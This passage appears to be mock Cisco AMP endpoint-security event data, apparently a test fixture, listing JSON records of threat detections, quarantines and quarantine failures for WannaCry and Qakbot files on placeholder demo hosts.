6":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0
fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
